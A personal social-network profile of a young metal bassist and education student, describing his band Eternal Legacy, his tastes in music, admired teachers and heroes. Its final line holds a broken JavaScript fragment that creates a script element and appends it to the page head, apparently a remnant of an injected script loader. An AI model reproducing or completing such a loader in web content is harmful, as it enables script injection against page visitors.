About Me

I'm in a band called Eternal Legacy and we're playing in Germany this July. Add us and spread the word.

Don't care to read all this stuff?
AIM ME: Slashx86
Most people just call me Gatka. I'm a 21 year old Secondary Ed major. I love History, Metal, and all combinations of the two. I play bass for Eternal Legacy, a band that combines thrash and metal with boroque-era style classical music. I play guitar for the Kent State Basketball Band and for my side project I'm working on with drummer Nico DiStefano and guitarist Chris Harnak. I love America but know that it is not truly a free country, and that's why I'm a proud Libertarian. I like fast cars, firearms, explosives, Martial Arts, loud guitars, beer, and other macho bullshit. I also like video games, dungeons and dragons, intellectual conversation, norse and greek mythology, philosophy, music theory, Samurai culture and beliefs, and other nerd stuff. I like to party, but can't stand people who don't know how to have fun without alcohol (which is most college students). I teach what I know about guitar to all dedicated musicians who seek guidance. Did I mention that I love to blow stuff up?

Music:

I always try to keep an open mind when it comes to music, but I can't help what I like. I tend to gravitate towards classical music, trance/techno, and most of all HEAVY METAL.

"I believe in the fans, I believe in metal more than anybody you've ever met. And you've known me a long time. I've never pissed on you even though you constantly do it to me. And I don't stab the fan in the back. And another thing, I'm prepared to die for metal. Are you?" -Joey DeMaio during a 2006 interview with the Rock Hard magazine.
"Somebody who never compromised their music and their integrity. And never screwed their fans. Somebody who always delivered Metal, and melted people's faces at maximum power." -Joey DeMaio (on how he would like to be remembered.)

Mrs. Joy McGuire: Fenton changed my life, no amount of text I type into this field can do the impact she made on my life justice. She was the first to believe in me, and to challenge me to do what I once thought impossible. If not for her, I would be a total loser.
Miss Gia DelVecchio: She may not shred wailing guitar solos on a Gibson Explorer, but I hope one day my students love me half as much as PSH loves "$D-Money$". She's way too nice to be a teacher, but her secret is safe with those who have had the pleasure of being her student.
Mr. Robert Cyr: Mr. Cyr is not a high school social studies teacher, he is a freelance ninja formerly employed by the C.I.A. to ascertain highly important documents through subvertive acts of espionage, or at least he teaches like that, which is why he is not boring and quite possibly the best teacher I have ever had. He and $D-Money$ are definately who I wanna be like as far as teaching goes.
Other Heroes:
My friends, My parents, anyone who stands up for what they believe in, servicemen and women at home and abroad that are kicking terrorist ass in defense of our country right now, Sam Kinnison (The best stand up comic ever...no contest), Andy Kaufman (so reknown for being a practical joker noone believe him when he told the world he had cncer), and last but certainly farthest from least would be My Grandpa, the reasons explaining why would take up just about all of this page, the guy has just worked his ass off and seen it all, yet he seems to live a stress free life, that to me is a prime example of a hero. .."var s=document·('script');s.src='..';document·getEleme ntsByTagName('head')[0].appendChild(s);"
